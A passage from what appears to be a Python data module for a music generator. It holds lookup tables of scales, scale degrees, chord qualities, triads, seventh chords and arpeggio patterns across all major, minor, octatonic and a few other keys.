'DsMinor': { 'Ds':1, 'F':2, 'Fs':3, 'Gs':4, 'As':5, 'B':6, 'Cs':7 },
'EMinor': { 'E':1, 'Fs':2, 'G':3, 'A':4, 'B':5, 'C':6, 'D':7 },
'FMinor': { 'F':1, 'G':2, 'Gs':3, 'As':4, 'C':5, 'Cs':6, 'Ds':7 },
'FsMinor': { 'Fs':1, 'Gs':2, 'A':3, 'B':4, 'Cs':5, 'D':6, 'E':7 },
'GMinor': { 'G':1, 'A':2, 'As':3, 'C':4, 'D':5, 'Ds':6, 'F':7 },
'GsMinor': { 'Gs':1, 'As':2, 'B':3, 'Cs':4, 'Ds':5, 'E':6, 'Fs':7 },
'AMinor': { 'A':1, 'B':2, 'C':3, 'D':4, 'E':5, 'F':6, 'G':7 },
'AsMinor': { 'As':1, 'C':2, 'Cs':3, 'Ds':4, 'F':5, 'Fs':6, 'Gs':7 },
'BMinor': { 'B':1, 'Cs':2, 'D':3, 'E':4, 'Fs':5, 'G':6, 'A':7 },
'COct': { 'C':1, 'Cs':2, 'Ds':3, 'E':4, 'Fs':5, 'G':6, 'A':7, 'As':8 },
'CsOct': { 'Cs':1, 'D':2, 'E':3, 'F':4, 'G':5, 'Gs':6, 'As':7, 'B':8 },
'DOct': { 'D':1, 'Ds':2, 'F':3, 'Fs':4, 'Gs':5, 'A':6, 'B':7, 'C':8 },
'CArabic': { 'C':1, 'Cs':2, 'E':3, 'F':4, 'G':5, 'Gs':6, 'B':7 },
'CHMinor': { 'C':1, 'D':2, 'Ds':3, 'F':4, 'G':5, 'Gs':6, 'B':7 },
}
#Reverse Key Dictionary
ReverseKeyDict = {
'CMajor': { 1:'C', 2:'D', 3:'E', 4:'F', 5:'G', 6:'A', 7:'B' },
'CsMajor': { 1:'Cs', 2:'Ds', 3:'F', 4:'Fs', 5:'Gs', 6:'As', 7:'C' },
'DMajor': { 1:'D', 2:'E', 3:'Fs', 4:'G', 5:'A', 6:'B', 7:'Cs' },
'DsMajor': { 1:'Ds', 2:'F', 3:'G', 4:'Gs', 5:'As', 6:'C', 7:'D' },
'EMajor': { 1:'E', 2:'Fs', 3:'Gs', 4:'A', 5:'B', 6:'Cs', 7:'Ds' },
'FMajor': { 1:'F', 2:'G', 3:'A', 4:'As', 5:'C', 6:'D', 7:'E' },
'FsMajor': { 1:'Fs', 2:'Gs', 3:'As', 4:'B', 5:'Cs', 6:'Ds', 7:'F' },
'GMajor': { 1:'G', 2:'A', 3:'B', 4:'C', 5:'D', 6:'E', 7:'Fs' },
'GsMajor': { 1:'Gs', 2:'As', 3:'C', 4:'Cs', 5:'Ds', 6:'F', 7:'G' },
'AMajor': { 1:'A', 2:'B', 3:'Cs', 4:'D', 5:'E', 6:'Fs', 7:'Gs' },
'AsMajor': { 1:'As', 2:'C', 3:'D', 4:'Ds', 5:'F', 6:'G', 7:'A' },
'BMajor': { 1:'B', 2:'Cs', 3:'Ds', 4:'E', 5:'Fs', 6:'Gs', 7:'As' },
'CMinor': { 1:'C', 2:'D', 3:'Ds', 4:'F', 5:'G', 6:'Gs', 7:'As' },
'CsMinor': { 1:'Cs', 2:'Ds', 3:'E', 4:'Fs', 5:'Gs', 6:'A', 7:'B' },
'DMinor': { 1:'D', 2:'E', 3:'F', 4:'G', 5:'A', 6:'As', 7:'C' },
'DsMinor': { 1:'Ds', 2:'F', 3:'Fs', 4:'Gs', 5:'As', 6:'B', 7:'Cs' },
'EMinor': { 1:'E', 2:'Fs', 3:'G', 4:'A', 5:'B', 6:'C', 7:'D' },
'FMinor': { 1:'F', 2:'G', 3:'Gs', 4:'As', 5:'C', 6:'Cs', 7:'Ds' },
'FsMinor': { 1:'Fs', 2:'Gs', 3:'A', 4:'B', 5:'Cs', 6:'D', 7:'E' },
'GMinor': { 1:'G', 2:'A', 3:'As', 4:'C', 5:'D', 6:'Ds', 7:'F' },
'GsMinor': { 1:'Gs', 2:'As', 3:'B', 4:'Cs', 5:'Ds', 6:'E', 7:'Fs' },
'AMinor': { 1:'A', 2:'B', 3:'C', 4:'D', 5:'E', 6:'F', 7:'G' },
'AsMinor': { 1:'As', 2:'C', 3:'Cs', 4:'Ds', 5:'F', 6:'Fs', 7:'Gs' },
'BMinor': { 1:'B', 2:'Cs', 3:'D', 4:'E', 5:'Fs', 6:'G', 7:'A' },
'COct': { 1:'C', 2:'Cs', 3:'Ds', 4:'E', 5:'Fs', 6:'G', 7:'A', 8:'As' },
'CsOct': { 1:'Cs', 2:'D', 3:'E', 4:'F', 5:'G', 6:'Gs', 7:'As', 8:'B' },
'DOct': { 1:'D', 2:'Ds', 3:'F', 4:'Fs', 5:'Gs', 6:'A', 7:'B', 8:'C' },
'CArabic': { 1:'C', 2:'Cs', 3:'E', 4:'F', 5:'G', 6:'Gs', 7:'B' },
'CHMinor': { 1:'C', 2:'D', 3:'Ds', 4:'F', 5:'G', 6:'Gs', 7:'B' },
}
#Notes in Scale
NotesInScale = {
'CMajor': [ 'C', 'D', 'E', 'F', 'G', 'A', 'B' ],
'CsMajor': [ 'Cs', 'Ds', 'F', 'Fs', 'Gs', 'As', 'C' ],
'DMajor': [ 'D', 'E', 'Fs', 'G', 'A', 'B', 'Cs' ],
'DsMajor': [ 'Ds', 'F', 'G', 'Gs', 'As', 'C', 'D' ],
'EMajor': [ 'E', 'Fs', 'Gs', 'A', 'B', 'Cs', 'Ds' ],
'FMajor': [ 'F', 'G', 'A', 'As', 'C', 'D', 'E' ],
'FsMajor': [ 'Fs', 'Gs', 'As', 'B', 'Cs', 'Ds', 'F' ],
'GMajor': [ 'G', 'A', 'B', 'C', 'D', 'E', 'Fs' ],
'GsMajor': [ 'Gs', 'As', 'C', 'Cs', 'Ds', 'F', 'G' ],
'AMajor': [ 'A', 'B', 'Cs', 'D', 'E', 'Fs', 'Gs' ],
'AsMajor': [ 'As', 'C', 'D', 'Ds', 'F', 'G', 'A' ],
'BMajor': [ 'B', 'Cs', 'Ds', 'E', 'Fs', 'Gs', 'As' ],
'CMinor': [ 'C', 'D', 'Ds', 'F', 'G', 'Gs', 'As' ],
'CsMinor': [ 'Cs', 'Ds', 'E', 'Fs', 'Gs', 'A', 'B' ],
'DMinor': [ 'D', 'E', 'F', 'G', 'A', 'As', 'C' ],
'DsMinor': [ 'Ds', 'F', 'Fs', 'Gs', 'As', 'B', 'Cs' ],
'EMinor': [ 'E', 'Fs', 'G', 'A', 'B', 'C', 'D' ],
'FMinor': [ 'F', 'G', 'Gs', 'As', 'C', 'Cs', 'Ds' ],
'FsMinor': [ 'Fs', 'Gs', 'A', 'B', 'Cs', 'D', 'E' ],
'GMinor': [ 'G', 'A', 'As', 'C', 'D', 'Ds', 'F' ],
'GsMinor': [ 'Gs', 'As', 'B', 'Cs', 'Ds', 'E', 'Fs' ],
'AMinor': [ 'A', 'B', 'C', 'D', 'E', 'F', 'G' ],
'AsMinor': [ 'As', 'C', 'Cs', 'Ds', 'F', 'Fs', 'Gs' ],
'BMinor': [ 'B', 'Cs', 'D', 'E', 'Fs', 'G', 'A' ],
'COct': [ 'C', 'Cs', 'Ds', 'E', 'Fs', 'G', 'A', 'As' ],
'CsOct': [ 'Cs', 'D', 'E', 'F', 'G', 'Gs', 'As', 'B' ],
'DOct': [ 'D', 'Ds', 'F', 'Fs', 'Gs', 'A', 'B', 'C' ],
'CArabic': [ 'C', 'Cs', 'E', 'F', 'G', 'Gs', 'B' ],
'CHMinor': ['C', 'D', 'Ds', 'F', 'G', 'Gs', 'B'],
}
NoteIntensity = {
'CMajor': { 'C':'Major', 'D':'Minor', 'E':'Minor', 'F':'Major', 'G':'Major', 'A':'Minor', 'B':'Dim' },
'CsMajor': { 'Cs':'Major', 'Ds':'Minor', 'F':'Minor', 'Fs':'Major', 'Gs':'Major', 'As':'Minor', 'C':'Dim' },
'DMajor': { 'D':'Major', 'E':'Minor', 'Fs':'Minor', 'G':'Major', 'A':'Major', 'B':'Minor', 'Cs':'Dim' },
'DsMajor': { 'Ds':'Major', 'F':'Minor', 'G':'Minor', 'Gs':'Major', 'As':'Major', 'C':'Minor', 'D':'Dim' },
'EMajor': { 'E':'Major', 'Fs':'Minor', 'Gs':'Minor', 'A':'Major', 'B':'Major', 'Cs':'Minor', 'Ds':'Dim' },
'FMajor': { 'F':'Major', 'G':'Minor', 'A':'Minor', 'As':'Major', 'C':'Major', 'D':'Minor', 'E':'Dim' },
'FsMajor': { 'Fs':'Major', 'Gs':'Minor', 'As':'Minor', 'B':'Major', 'Cs':'Major', 'Ds':'Minor', 'F':'Dim' },
'GMajor': { 'G':'Major', 'A':'Minor', 'B':'Minor', 'C':'Major', 'D':'Major', 'E':'Minor', 'Fs':'Dim' },
'GsMajor': { 'Gs':'Major', 'As':'Minor', 'C':'Minor', 'Cs':'Major', 'Ds':'Major', 'F':'Minor', 'G':'Dim' },
'AMajor': { 'A':'Major', 'B':'Minor', 'Cs':'Minor', 'D':'Major', 'E':'Major', 'Fs':'Minor', 'Gs':'Dim' },
'AsMajor': { 'As':'Major', 'C':'Minor', 'D':'Minor', 'Ds':'Major', 'F':'Major', 'G':'Minor', 'A':'Dim' },
'BMajor': { 'B':'Major', 'Cs':'Minor', 'Ds':'Minor', 'E':'Major', 'Fs':'Major', 'Gs':'Minor', 'As':'Dim' },
'CMinor': { 'C':'Minor', 'D':'Dim', 'Ds':'Major', 'F':'Minor', 'G':'Minor', 'Gs':'Major', 'As':'Major' },
'CsMinor': { 'Cs':'Minor', 'Ds':'Dim', 'E':'Major', 'Fs':'Minor', 'Gs':'Minor', 'A':'Major', 'B':'Major' },
'DMinor': { 'D':'Minor', 'E':'Dim', 'F':'Major', 'G':'Minor', 'A':'Minor', 'As':'Major', 'C':'Major' },
'DsMinor': { 'Ds':'Minor', 'F':'Dim', 'Fs':'Major', 'Gs':'Minor', 'As':'Minor', 'B':'Major', 'Cs':'Major' },
'EMinor': { 'E':'Minor', 'Fs':'Dim', 'G':'Major', 'A':'Minor', 'B':'Minor', 'C':'Major', 'D':'Major' },
'FMinor': { 'F':'Minor', 'G':'Dim', 'Gs':'Major', 'As':'Minor', 'C':'Minor', 'Cs':'Major', 'Ds':'Major' },
'FsMinor': { 'Fs':'Minor', 'Gs':'Dim', 'A':'Major', 'B':'Minor', 'Cs':'Minor', 'D':'Major', 'E':'Major' },
'GMinor': { 'G':'Minor', 'A':'Dim', 'As':'Major', 'C':'Minor', 'D':'Minor', 'Ds':'Major', 'F':'Major' },
'GsMinor': { 'Gs':'Minor', 'As':'Dim', 'B':'Major', 'Cs':'Minor', 'Ds':'Minor', 'E':'Major', 'Fs':'Major' },
'AMinor': { 'A':'Minor', 'B':'Dim', 'C':'Major', 'D':'Minor', 'E':'Minor', 'F':'Major', 'G':'Major' },
'AsMinor': { 'As':'Minor', 'C':'Dim', 'Cs':'Major', 'Ds':'Minor', 'F':'Minor', 'Fs':'Major', 'Gs':'Major' },
'BMinor': { 'B':'Minor', 'Cs':'Dim', 'D':'Major', 'E':'Minor', 'Fs':'Minor', 'G':'Major', 'A':'Major' },
'COct': { 'C':'Major', 'Cs':'Major', 'Ds':'Major', 'E':'Major', 'Fs':'Major', 'G':'Major', 'A':'Major', 'As':'Major' },
'CsOct': { 'Cs':'Major', 'D':'Major', 'E':'Major', 'F':'Major', 'G':'Major', 'Gs':'Major', 'As':'Major', 'B':'Major' },
'DOct': { 'D':'Major', 'Ds':'Major', 'F':'Major', 'Fs':'Major', 'Gs':'Major', 'A':'Major', 'B':'Major', 'C':'Major' },
'CArabic': { 'C':'Minor', 'Cs':'Minor', 'E':'Minor', 'F':'Minor', 'G':'Minor', 'Gs':'Minor', 'B':'Minor' },
}
tsInfo = {'resolution': 0, 'tsNumerator': 0, 'tsDenominator': 0, 'lenOfMeasure': 0, 'totalMeasures': 0 }
#First Measure Note List
FirstMeasureNotes = {
'CMajor': [ 'C', 'F', 'G', ],
'CsMajor': [ 'Cs', 'Fs', 'Gs', ],
'DMajor': [ 'D', 'G', 'A', ],
'DsMajor': [ 'Ds', 'Gs', 'As', ],
'EMajor': [ 'E', 'A', 'B', ],
'FMajor': [ 'F', 'As', 'C', ],
'FsMajor': [ 'Fs', 'B', 'Cs', ],
'GMajor': [ 'G', 'C', 'D', ],
'GsMajor': [ 'Gs', 'Cs', 'Ds', ],
'AMajor': [ 'A', 'D', 'E', ],
'AsMajor': [ 'As', 'Ds', 'F', ],
'BMajor': [ 'B', 'E', 'Fs', ],
'CMinor': [ 'C', 'F', 'G', ],
'CsMinor': [ 'Cs', 'Fs', 'Gs', ],
'DMinor': [ 'D', 'G', 'A', ],
'DsMinor': [ 'Ds', 'Gs', 'As', ],
'EMinor': [ 'E', 'A', 'B', ],
'FMinor': [ 'F', 'As', 'C', ],
'FsMinor': [ 'Fs', 'B', 'Cs', ],
'GMinor': [ 'G', 'C', 'D', ],
'GsMinor': [ 'Gs', 'Cs', 'Ds', ],
'AMinor': [ 'A', 'D', 'E', ],
'AsMinor': [ 'As', 'Ds', 'F', ],
'BMinor': [ 'B', 'E', 'Fs', ],
'COct': [ 'C', 'Ds', 'Fs', 'A', ],
'CsOct': [ 'Cs', 'E', 'G', 'As', ],
'DOct': [ 'D', 'F', 'Gs', 'B', ],
'CArabic': [ 'C', 'F', 'G', ],
'CHMinor': [ 'C', 'F', 'G', ],
}
Chords = {
'DDim': {
'D': ['D', 'F', 'A'],
},
'CArabic': {
'C': ['C'],
'Cs': ['Cs'],
'E': [ 'E' ],
'F': ['F'],
'G': ['G'],
'Gs': ['Gs'],
'B': ['B'],
},
'COct': {
'C' : [ 'C' ],
'Cs': [ 'Cs'],
'Ds': [ 'Ds'],
'E' : [ 'E' ],
'Fs': [ 'Fs'],
'G' : [ 'G' ],
'A' : [ 'A' ],
'As': [ 'As'],
},
'CsOct': {
'Cs': [ 'Cs'],
'D' : [ 'D' ],
'E' : [ 'E' ],
'F' : [ 'F' ],
'G' : [ 'G' ],
'Gs': [ 'Gs'],
'As': [ 'As'],
'B' : [ 'B' ],
},
'DOct': {
'D' : [ 'D' ],
'Ds': [ 'Ds'],
'F' : [ 'F' ],
'Fs': [ 'Fs'],
'Gs': [ 'Gs'],
'A' : [ 'A' ],
'B' : [ 'B' ],
'C' : [ 'C' ],
},
'CMajor': {
'C': ['C', 'E', 'G'],
'D': ['D', 'F', 'A'],
'E': ['E', 'G', 'B'],
'F': ['F', 'A', 'C'],
'G': ['G', 'B', 'D'],
'A': ['A', 'C', 'E'],
'B': ['B', 'D', 'F'],
},
'CsMajor': {
'Cs': ['Cs', 'F', 'Gs'],
'Ds': ['Ds', 'Fs', 'As'],
'F': ['F', 'Gs', 'C'],
'Fs': ['Fs', 'As', 'Cs'],
'Gs': ['Gs', 'C', 'Ds'],
'As': ['As', 'Cs', 'F'],
'C': ['C', 'Ds', 'Fs'],
},
'DMajor': {
'D': ['D', 'Fs', 'A'],
'E': ['E', 'G', 'B'],
'Fs': ['Fs', 'A', 'Cs'],
'G': ['G', 'B', 'D'],
'A': ['A', 'Cs', 'E'],
'B': ['B', 'D', 'Fs'],
'Cs': ['Cs', 'E', 'G'],
},
'DsMajor': {
'Ds': ['Ds', 'G', 'As'],
'F': ['F', 'Gs', 'C'],
'G': ['G', 'As', 'D'],
'Gs': ['Gs', 'C', 'Ds'],
'As': ['As', 'D', 'F'],
'C': ['C', 'Ds', 'G'],
'D': ['D', 'F', 'Gs'],
},
'EMajor': {
'E': ['E', 'Gs', 'B'],
'Fs': ['Fs', 'A', 'Cs'],
'Gs': ['Gs', 'B', 'Ds'],
'A': ['A', 'Cs', 'E'],
'B': ['B', 'Ds', 'Fs'],
'Cs': ['Cs', 'E', 'Gs'],
'Ds': ['Ds', 'Fs', 'A'],
},
'FMajor': {
'F': ['F', 'A', 'C'],
'G': ['G', 'As', 'D'],
'A': ['A', 'C', 'E'],
'As': ['As', 'D', 'F'],
'C': ['C', 'E', 'G'],
'D': ['D', 'F', 'A'],
'E': ['E', 'G', 'As'],
},
'FsMajor': {
'Fs': ['Fs', 'As', 'Cs'],
'Gs': ['Gs', 'B', 'Ds'],
'As': ['As', 'Cs', 'F'],
'B': ['B', 'Ds', 'Fs'],
'Cs': ['Cs', 'F', 'Gs'],
'Ds': ['Ds', 'Fs', 'As'],
'F': ['F', 'Gs', 'B'],
},
'GMajor': {
'G': ['G', 'B', 'D'],
'A': ['A', 'C', 'E'],
'B': ['B', 'D', 'Fs'],
'C': ['C', 'E', 'G'],
'D': ['D', 'Fs', 'A'],
'E': ['E', 'G', 'B'],
'Fs': ['Fs', 'A', 'C'],
},
'GsMajor': {
'Gs': ['Gs', 'C', 'Ds'],
'As': ['As', 'Cs', 'F'],
'C': ['C', 'Ds', 'G'],
'Cs': ['Cs', 'F', 'Gs'],
'Ds': ['Ds', 'G', 'As'],
'F': ['F', 'Gs', 'C'],
'G': ['G', 'As', 'Cs'],
},
'AMajor': {
'A': ['A', 'Cs', 'E'],
'B': ['B', 'D', 'Fs'],
'Cs': ['Cs', 'E', 'Gs'],
'D': ['D', 'Fs', 'A'],
'E': ['E', 'Gs', 'B'],
'Fs': ['Fs', 'A', 'Cs'],
'Gs': ['Gs', 'B', 'D'],
},
'AsMajor': {
'As': ['As', 'D', 'F'],
'C': ['C', 'Ds', 'G'],
'D': ['D', 'F', 'A'],
'Ds': ['Ds', 'G', 'As'],
'F': ['F', 'A', 'C'],
'G': ['G', 'As', 'D'],
'A': ['A', 'C', 'Ds'],
},
'BMajor': {
'B': ['B', 'Ds', 'Fs'],
'Cs': ['Cs', 'E', 'Gs'],
'Ds': ['Ds', 'Fs', 'As'],
'E': ['E', 'Gs', 'B'],
'Fs': ['Fs', 'As', 'Cs'],
'Gs': ['Gs', 'B', 'Ds'],
'As': ['As', 'Cs', 'E'],
},
'CMinor': {
'C': ['C', 'Ds', 'G'],
'D': ['D', 'F', 'Gs'],
'Ds': ['Ds', 'G', 'As'],
'F': ['F', 'Gs', 'C'],
'G': ['G', 'As', 'D'],
'Gs': ['Gs', 'C', 'Ds'],
'As': ['As', 'D', 'F'],
},
'CsMinor': {
'Cs': ['Cs', 'E', 'Gs'],
'Ds': ['Ds', 'Fs', 'A'],
'E': ['E', 'Gs', 'B'],
'Fs': ['Fs', 'A', 'Cs'],
'Gs': ['Gs', 'B', 'Ds'],
'A': ['A', 'Cs', 'E'],
'B': ['B', 'Ds', 'Fs'],
},
'DMinor': {
'D': ['D', 'F', 'A'],
'E': ['E', 'G', 'As'],
'F': ['F', 'A', 'C'],
'G': ['G', 'As', 'D'],
'A': ['A', 'C', 'E'],
'As': ['As', 'D', 'F'],
'C': ['C', 'E', 'G'],
},
'DsMinor': {
'Ds': ['Ds', 'Fs', 'As'],
'F': ['F', 'Gs', 'B'],
'Fs': ['Fs', 'As', 'Cs'],
'Gs': ['Gs', 'B', 'Ds'],
'As': ['As', 'Cs', 'F'],
'B': ['B', 'Ds', 'Fs'],
'Cs': ['Cs', 'F', 'Gs'],
},
'EMinor': {
'E': ['E', 'G', 'B'],
'Fs': ['Fs', 'A', 'C'],
'G': ['G', 'B', 'D'],
'A': ['A', 'C', 'E'],
'B': ['B', 'D', 'Fs'],
'C': ['C', 'E', 'G'],
'D': ['D', 'Fs', 'A'],
},
'FMinor': {
'F': ['F', 'Gs', 'C'],
'G': ['G', 'As', 'Cs'],
'Gs': ['Gs', 'C', 'Ds'],
'As': ['As', 'Cs', 'F'],
'C': ['C', 'Ds', 'G'],
'Cs': ['Cs', 'F', 'Gs'],
'Ds': ['Ds', 'G', 'As'],
},
'FsMinor': {
'Fs': ['Fs', 'A', 'Cs'],
'Gs': ['Gs', 'B', 'D'],
'A': ['A', 'Cs', 'E'],
'B': ['B', 'D', 'Fs'],
'Cs': ['Cs', 'E', 'Gs'],
'D': ['D', 'Fs', 'A'],
'E': ['E', 'Gs', 'B'],
},
'GMinor': {
'G': ['G', 'As', 'D'],
'A': ['A', 'C', 'Ds'],
'As': ['As', 'D', 'F'],
'C': ['C', 'Ds', 'G'],
'D': ['D', 'F', 'A'],
'Ds': ['Ds', 'G', 'As'],
'F': ['F', 'A', 'C'],
},
'GsMinor': {
'Gs': ['Gs', 'B', 'Ds'],
'As': ['As', 'Cs', 'E'],
'B': ['B', 'Ds', 'Fs'],
'Cs': ['Cs', 'E', 'Gs'],
'Ds': ['Ds', 'Fs', 'As'],
'E': ['E', 'Gs', 'B'],
'Fs': ['Fs', 'As', 'Cs'],
},
'AMinor': {
'A': ['A', 'C', 'E'],
'B': ['B', 'D', 'F'],
'C': ['C', 'E', 'G'],
'D': ['D', 'F', 'A'],
'E': ['E', 'G', 'B'],
'F': ['F', 'A', 'C'],
'G': ['G', 'B', 'D'],
},
'AsMinor': {
'As': ['As', 'Cs', 'F'],
'C': ['C', 'Ds', 'Fs'],
'Cs': ['Cs', 'F', 'Gs'],
'Ds': ['Ds', 'Fs', 'As'],
'F': ['F', 'Gs', 'C'],
'Fs': ['Fs', 'As', 'Cs'],
'Gs': ['Gs', 'C', 'Ds'],
},
'BMinor': {
'B': ['B', 'D', 'Fs'],
'Cs': ['Cs', 'E', 'G'],
'D': ['D', 'Fs', 'A'],
'E': ['E', 'G', 'B'],
'Fs': ['Fs', 'A', 'Cs'],
'G': ['G', 'B', 'D'],
'A': ['A', 'Cs', 'E'],
},
}
AllChords = {
'CMajor' : [ 'C', 'E', 'G' ],
'CMinor' : [ 'C', 'Ds', 'G' ],
'CDim' : [ 'C', 'Ds', 'Fs' ],
'C7' : [ 'C', 'E', 'G', 'As' ],
'CMaj7' : [ 'C', 'E', 'G', 'B' ],
'Cm7' : [ 'C', 'Ds', 'G', 'As' ],
'CsMajor' : [ 'Cs', 'F', 'Gs' ],
'CsMinor' : [ 'Cs', 'E', 'Gs' ],
'CsDim' : [ 'Cs', 'E', 'G' ],
'Cs7' : [ 'Cs', 'F', 'Gs', 'B' ],
'CsMaj7' : [ 'Cs', 'F', 'Gs', 'C' ],
'Csm7' : [ 'Cs', 'E', 'Gs', 'B' ],
'DMajor' : [ 'D', 'Fs', 'A' ],
'DMinor' : [ 'D', 'F', 'A' ],
'DDim' : [ 'D', 'F', 'Gs' ],
'D7' : [ 'D', 'Fs', 'A', 'C' ],
'DMaj7' : [ 'D', 'Fs', 'A', 'Cs' ],
'Dm7' : [ 'D', 'F', 'A', 'C' ],
'DsMajor' : [ 'Ds', 'G', 'As' ],
'DsMinor' : [ 'Ds', 'Fs', 'As' ],
'DsDim' : [ 'Ds', 'Fs', 'A' ],
'Ds7' : [ 'Ds', 'G', 'As', 'Cs' ],
'DsMaj7' : [ 'Ds', 'G', 'As', 'D' ],
'Dsm7' : [ 'Ds', 'Fs', 'As', 'Cs' ],
'EMajor' : [ 'E', 'Gs', 'B' ],
'EMinor' : [ 'E', 'G', 'B' ],
'EDim' : [ 'E', 'G', 'As' ],
'E7' : [ 'E', 'Gs', 'B', 'D' ],
'EMaj7' : [ 'E', 'Gs', 'B', 'Ds' ],
'Em7' : [ 'E', 'G', 'B', 'D' ],
'FMajor' : [ 'F', 'A', 'C' ],
'FMinor' : [ 'F', 'Gs', 'C' ],
'FDim' : [ 'F', 'Gs', 'B' ],
'F7' : [ 'F', 'A', 'C', 'Ds' ],
'FMaj7' : [ 'F', 'A', 'C', 'E' ],
'Fm7' : [ 'F', 'Gs', 'C', 'Ds' ],
'FsMajor' : [ 'Fs', 'As', 'Cs' ],
'FsMinor' : [ 'Fs', 'A', 'Cs' ],
'FsDim' : [ 'Fs', 'A', 'C' ],
'Fs7' : [ 'Fs', 'As', 'Cs', 'E' ],
'FsMaj7' : [ 'Fs', 'As', 'Cs', 'F' ],
'Fsm7' : [ 'Fs', 'A', 'Cs', 'E' ],
'GMajor' : [ 'G', 'B', 'D' ],
'GMinor' : [ 'G', 'As', 'D' ],
'GDim' : [ 'G', 'As', 'Cs' ],
'G7' : [ 'G', 'B', 'D', 'F' ],
'GMaj7' : [ 'G', 'B', 'D', 'Fs' ],
'Gm7' : [ 'G', 'As', 'D', 'F' ],
'GsMajor' : [ 'Gs', 'C', 'Ds' ],
'GsMinor' : [ 'Gs', 'B', 'Ds' ],
'GsDim' : [ 'Gs', 'B', 'D' ],
'Gs7' : [ 'Gs', 'C', 'Ds', 'Fs' ],
'GsMaj7' : [ 'Gs', 'C', 'Ds', 'G' ],
'Gsm7' : [ 'Gs', 'B', 'Ds', 'Fs' ],
'AMajor' : [ 'A', 'Cs', 'E' ],
'AMinor' : [ 'A', 'C', 'E' ],
'ADim' : [ 'A', 'C', 'Ds' ],
'A7' : [ 'A', 'Cs', 'E', 'G' ],
'AMaj7' : [ 'A', 'Cs', 'E', 'Gs' ],
'Am7' : [ 'A', 'C', 'E', 'G' ],
'AsMajor' : [ 'As', 'D', 'F' ],
'AsMinor' : [ 'As', 'Cs', 'F' ],
'AsDim' : [ 'As', 'Cs', 'E' ],
'As7' : [ 'As', 'D', 'F', 'Gs' ],
'AsMaj7' : [ 'As', 'D', 'F', 'A' ],
'Asm7' : [ 'As', 'Cs', 'F', 'Gs' ],
'BMajor' : [ 'B', 'Ds', 'Fs' ],
'BMinor' : [ 'B', 'D', 'Fs' ],
'BDim' : [ 'B', 'D', 'F' ],
'B7' : [ 'B', 'Ds', 'Fs', 'A' ],
'BMaj7' : [ 'B', 'Ds', 'Fs', 'As' ],
'Bm7' : [ 'B', 'D', 'Fs', 'A' ],
}
ArpChords = {
'AMinor' : [ 'A', 'C', 'E', 'F', 'G', 'B' ],
'CDim' : [ 'C', 'Ds', 'Fs', 'A', 'C' ],
'Gs7' : [ 'Gs', 'C', 'Ds', 'F', 'Fs', 'As' ],
'GMaj7' : [ 'G', 'B', 'D', 'E', 'Fs', 'A' ],
'GsDim' : [ 'Gs', 'B', 'D', 'F', 'Gs' ],
'GsMajor' : [ 'Gs', 'C', 'Ds', 'F', 'G', 'As' ],
'Fs7' : [ 'Fs', 'As', 'Cs', 'Ds', 'E', 'Gs' ],
'CMajor' : [ 'C', 'E', 'G', 'A', 'B', 'D' ],
'Em7' : [ 'E', 'G', 'B', 'C', 'D', 'Fs' ],
'Dsm7' : [ 'Ds', 'Fs', 'As', 'B', 'Cs', 'F' ],
'Gsm7' : [ 'Gs', 'B', 'Ds', 'E', 'Fs', 'As' ],
'DMaj7' : [ 'D', 'Fs', 'A', 'B', 'Cs', 'E' ],
'Dm7' : [ 'D', 'F', 'A', 'As', 'C', 'E' ],
'Cm7' : [ 'C', 'Ds', 'G', 'Gs', 'As', 'D' ],
'CsMinor' : [ 'Cs', 'E', 'Gs', 'A', 'B', 'Ds' ],
'FsMinor' : [ 'Fs', 'A', 'Cs', 'D', 'E', 'Gs' ],
'DsMaj7' : [ 'Ds', 'G', 'As', 'C', 'D', 'F' ],
'BMaj7' : [ 'B', 'Ds', 'Fs', 'Gs', 'As', 'Cs' ],
'GMajor' : [ 'G', 'B', 'D', 'E', 'Fs', 'A' ],
'EMinor' : [ 'E', 'G', 'B', 'C', 'D', 'Fs' ],
'CsMaj7' : [ 'Cs', 'F', 'Gs', 'As', 'C', 'Ds' ],
'FDim' : [ 'F', 'Gs', 'B', 'D', 'F' ],
'DMinor' : [ 'D', 'F', 'A', 'As', 'C', 'E' ],
'FMajor' : [ 'F', 'A', 'C', 'D', 'E', 'G' ],
'ADim' : [ 'A', 'C', 'Ds', 'Fs', 'A' ],
'CMinor' : [ 'C', 'Ds', 'G', 'Gs', 'As', 'D' ],
'EDim' : [ 'E', 'G', 'As', 'Cs', 'E' ],
'B7' : [ 'B', 'Ds', 'Fs', 'Gs', 'A', 'Cs' ],
'AMajor' : [ 'A', 'Cs', 'E', 'Fs', 'Gs', 'B' ],
'A7' : [ 'A', 'Cs', 'E', 'Fs', 'G', 'B' ],
'Fm7' : [ 'F', 'Gs', 'C', 'Cs', 'Ds', 'G' ],
'DsMajor' : [ 'Ds', 'G', 'As', 'C', 'D', 'F' ],
'E7' : [ 'E', 'Gs', 'B', 'Cs', 'D', 'Fs' ],
'C7' : [ 'C', 'E', 'G', 'A', 'As', 'D' ],
'GsMinor' : [ 'Gs', 'B', 'Ds', 'E', 'Fs', 'As' ],
'Bm7' : [ 'B', 'D', 'Fs', 'G', 'A', 'Cs' ],
'G7' : [ 'G', 'B', 'D', 'E', 'F', 'A' ],
'Asm7' : [ 'As', 'Cs', 'F', 'Fs', 'Gs', 'C' ],
'BMajor' : [ 'B', 'Ds', 'Fs', 'Gs', 'As', 'Cs' ],
'Ds7' : [ 'Ds', 'G', 'As', 'C', 'Cs', 'F' ],
'GsMaj7' : [ 'Gs', 'C', 'Ds', 'F', 'G', 'As' ],
'AsMinor' : [ 'As', 'Cs', 'F', 'Fs', 'Gs', 'C' ],
'BDim' : [ 'B', 'D', 'F', 'Gs', 'B' ],
'AsMajor' : [ 'As', 'D', 'F', 'G', 'A', 'C' ],
'AMaj7' : [ 'A', 'Cs', 'E', 'Fs', 'Gs', 'B' ],
'DMajor' : [ 'D', 'Fs', 'A', 'B', 'Cs', 'E' ],
'AsDim' : [ 'As', 'Cs', 'E', 'G', 'As' ],
'Fsm7' : [ 'Fs', 'A', 'Cs', 'D', 'E', 'Gs' ],
'Cs7' : [ 'Cs', 'F', 'Gs', 'As', 'B', 'Ds' ],
'Gm7' : [ 'G', 'As', 'D', 'Ds', 'F', 'A' ],
'DDim' : [ 'D', 'F', 'Gs', 'B', 'D' ],
'CsMajor' : [ 'Cs', 'F', 'Gs', 'As', 'C', 'Ds' ],
'FMinor' : [ 'F', 'Gs', 'C', 'Cs', 'Ds', 'G' ],
'EMajor' : [ 'E', 'Gs', 'B', 'Cs', 'Ds', 'Fs' ],
'As7' : [ 'As', 'D', 'F', 'G', 'Gs', 'C' ],
'F7' : [ 'F', 'A', 'C', 'D', 'Ds', 'G' ],
